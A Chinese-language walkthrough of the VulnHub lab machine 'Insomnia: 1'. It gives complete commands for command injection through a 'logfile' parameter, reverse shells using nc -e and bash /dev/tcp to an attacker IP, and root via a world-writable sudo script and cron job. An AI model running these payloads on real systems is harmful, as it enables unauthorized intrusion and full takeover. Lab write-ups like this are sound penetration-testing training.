Insomnia
作者: jason_huawen
靶机基本信息
名称:Insomnia: 1
地址:
https://www.vulnhub.com/entry/insomnia-1,644/
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.72.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:51:64:78 1 60 PCS Systemtechnik GmbH
192.168.56.220 08:00:27:cc:a0:fd 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.220
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.220 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-25 04:12 EST
Nmap scan report for bogon (192.168.56.220)
Host is up (0.00013s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
8080/tcp open http PHP cli server 5.5 or later (PHP 7.3.19-1)
|_http-title: Chat
MAC Address: 08:00:27:CC:A0:FD (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.45 seconds
NMAP扫描结果表明目标主机有1个开放端口8080(HTTP)
Get Access
访问目标主机的8080端口,但是似乎这个应用运行有问题,不能正常提交数据,查看页面源代码,发现缺少"submit"元素,所以无法正常提交数据。
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Chat</title>
<link rel="stylesheet" href="style.css" type="text/css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script>
<script type="text/javascript" src="chat.js"></script>
<script type="text/javascript">
// ask user for name with popup prompt
var name = prompt("Enter your nickname:", "guest");
// default name is 'Guest'
if (!name || name === ' ') {
name = "guest";
}
// strip tags
name = name.replace(/(<([^>]+)>)/ig,"");
// display name on page
$("#name-area").html("You are: <span>" + name + "</span>");
// kick off chat
var chat = new Chat();
$(function() {
chat.getState();
// watch textarea for key presses
$("#sendie").keydown(function(event) {
var key = event.which;
//all keys including return.
if (key >= 33) {
var maxLength = $(this).attr("maxlength");
var length = this.value.length;
// don't allow new content if length is maxed out
if (length >= maxLength) {
event.preventDefault();
}
}
});
// watch textarea for release of key press
$('#sendie').keyup(function(e) {
if (e.keyCode == 13) {
var text = $(this).val();
var maxLength = $(this).attr("maxlength");
var length = text.length;
// send
if (length <= maxLength + 1) {
chat.send(text, name);
$(this).val("");
} else {
$(this).val(text.substring(0, maxLength));
}
}
});
});
</script>
</head>
<body onl oad="setInterval('chat.update()', 1000)">
<div id="page-wrap">
<h2>Insomnia Chat</h2>
<p id="name-area"></p>
<div id="chat-wrap"><div id="chat-area"></div></div>
<form id="send-message-area">
<h2>Your message</h2>
<textarea id="sendie" maxlength = '300' ></textarea>
</form>
</div>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/robots.txt
<!doctype html><html><head><title>404 Not Found</title><style>
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
</style>
</head><body><h1>Not Found</h1><p>The requested resource <code class="url">/robots.txt</code> was not found on this server.</p></body></html>
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ nikto -h http://192.168.56.220:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.220
+ Target Hostname: 192.168.56.220
+ Target Port: 8080
+ Start Time: 2022-11-25 04:18:49 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-powered-by header: PHP/7.3.19-1~deb10u1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-11-25 04:19:02 (GMT-5) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
似乎有命令执行漏洞,暂时先搁置,先扫描一下有无可利用的目录或者文件。
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ gobuster dir -u http://192.168.56.220:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.220:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/25 05:46:49 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.220:8080/8d9d8218-6616-4d06-9215-7f99b4b82f9f => 200 (Length: 2899). To continue please exclude the status code or the length
运行gobuster似乎出错,要加上选项exclude
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ gobuster dir -u http://192.168.56.220:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --exclude-length 2899 -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.220:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 2899
[+] User Agent: gobuster/3.3
[+] Extensions: sh,txt,php,html
[+] Timeout: 10s
===============================================================
2022/11/25 05:49:31 Starting gobuster in directory enumeration mode
===============================================================
/start.sh (Status: 200) [Size: 20]
/administration.php (Status: 200) [Size: 65]
/process.php (Status: 200) [Size: 2]
Progress: 1102039 / 1102805 (99.93%)===============================================================
2022/11/25 05:57:30 Finished
===============================================================
这次扫描出来3个文件,分别访问这些文件:
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ cat start.sh
php -S 0.0.0.0:8080
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/start.sh
php -S 0.0.0.0:8080
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php
You are not allowed to view : <br>Your activity has been logged
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/process.php
[]
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$
只有/administration.php有价值,而且从返回的页面内容看似乎有本地文件包含漏洞,那先FUZZ一下是什么参数?
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ wfuzz -c -u http://192.168.56.220:8080/administration.php?FUZZ=../../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 65
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.220:8080/administration.php?FUZZ=../../../../../../etc/passwd
Total requests: 4713
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002506: 200 2 L 12 W 93 Ch "logfile"
Total time: 0
Processed Requests: 4713
Filtered Requests: 4712
Requests/sec.: 0
这里如果用hw作为过滤参数,会扫描不出来这个参数。但是利用这个参数访问文件/etc/passwd,并不是输出内容,而是输出:
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=../../../../../../etc/passwd
You are not allowed to view : ../../../../../../etc/passwd<br>Your activity has been logged
尝试执行命令(组合命令)
──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=whoami
You are not allowed to view : whoami<br>Your activity has been logged
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=chat.txt;whoami
kali
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=/etc/passwd;whoami
You are not allowed to view : /etc/passwd<br>Your activity has been logged
kali
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=/etc/passwd;nc -e /bin/bash 192.168.56.206 5555
You are not allowed to view : /etc/passwd<br>Your activity has been logged
在Kali Linxu上成功得到了目标主机反弹回来的shell
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.206] 56302
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),115(bluetooth),125(scanner),141(wireshark),143(kaboxer),144(vboxsf)
这里需要特别注意,用curl命令去访问下面的链接,虽然Kali Linux可以得到反弹回来的shell,但是当将该shell稳定化,即执行python -c 'import pty;pty.spawn("/bin/bash")'时就无缘无故的就断开链接,而用浏览器访问下面的链接就没有问题
http://192.168.56.220:8080/administration.php?logfile=/etc/passwd;nc%20-e%20/bin/bash%20192.168.56.206%205555
www-data@insomnia:~/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on insomnia:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on insomnia:
(julia) NOPASSWD: /bin/bash /var/www/html/start.sh
www-data@insomnia:~/html$ ls -alh /var/www/html/start.sh
ls -alh /var/www/html/start.sh
-rwxrwxrwx 1 root root 20 Dec 21 2020 /var/www/html/start.sh
www-data@insomnia:~/html$ cat /var/www/html/start.sh
cat /var/www/html/start.sh
php -S 0.0.0.0:8080
而start.sh文件时可以编辑的,因此可以加一个/bin/bash
www-data@insomnia:~/html$ echo '/bin/bash' >> /var/www/html/start.sh
echo '/bin/bash' >> /var/www/html/start.sh
执行该脚本应该就可以得到julia用户的shell
www-data@insomnia:~/html$ sudo -u julia /bin/bash /var/www/html/start.sh
sudo -u julia /bin/bash /var/www/html/start.sh
[Fri Nov 25 06:40:45 2022] Failed to listen on 0.0.0.0:8080 (reason: Address already in use)
julia@insomnia:/var/www/html$ id
id
uid=1000(julia) gid=1000(julia) groups=1000(julia),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
julia@insomnia:/var/www/html$
julia@insomnia:/var/www/html$ cd /home
cd /home
julia@insomnia:/home$ ls
ls
julia
julia@insomnia:/home$ cd julia
cd julia
julia@insomnia:~$ ls -alh
ls -alh
total 32K
drwxrwxr-x 3 julia julia 4.0K Dec 21 2020 .
drwxr-xr-x 3 root root 4.0K Dec 15 2020 ..
-rw------- 1 julia julia 379 Dec 21 2020 .bash_history
-rw-r--r-- 1 julia julia 220 Nov 30 2020 .bash_logout
-rw-r--r-- 1 julia julia 3.5K Nov 30 2020 .bashrc
drwxr-xr-x 3 julia julia 4.0K Dec 21 2020 .local
-rw-r--r-- 1 julia julia 807 Nov 30 2020 .profile
-rw-r--r-- 1 julia julia 86 Dec 15 2020 user.txt
julia@insomnia:~$ cat user.txt
cat user.txt
~~~~~~~~~~~~~\
USER INSOMNIA
~~~~~~~~~~~~~
Flag : [c2e285cb33cecdbeb83d2189e983a8c0]
提权
julia@insomnia:~$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root /bin/bash /var/cron/check.sh
发现root会每分钟执行check.sh脚本
julia@insomnia:~$ ls -alh /var/cron/check.sh
ls -alh /var/cron/check.sh
-rwxrwxrwx 1 root root 153 Dec 21 2020 /var/cron/check.sh
完全可以修改check.sh脚本使得spawn出另一个shell,从而得到root权限
julia@insomnia:~$ echo 'bash -i >& /dev/tcp/192.168.56.206/9999 0>&1' >> /var/cron/check.sh
<tcp/192.168.56.206/9999 0>&1' >> /var/cron/check.sh
julia@insomnia:~$
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ sudo nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.220] 59222
bash: cannot set terminal process group (9199): Inappropriate ioctl for device
bash: no job control in this shell
root@insomnia:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@insomnia:~# cd /root
cd /root
root@insomnia:~# ls
ls
root.txt
root@insomnia:~# cat root.txt
cat root.txt
~~~~~~~~~~~~~~~\
ROOTED INSOMNIA
~~~~~~~~~~~~~~~
Flag : [c84baebe0faa2fcdc2f1a4a9f6e2fbfc]
by Alienum with <3
root@insomnia:~#
成功得到了Root shell.
经验教训:
-
Gobuster工具如果运行错误,考虑需要加上exclude选项;
-
Wfuzz的过滤参数在不同情况下可能有不同的结果,有些可能会失败;
-
在反弹shell时,有些时候用命令行的curl发起请求会导致生成的shell不稳定。
-
有些时候LFI并不一定表现为文件包含,而是命令执行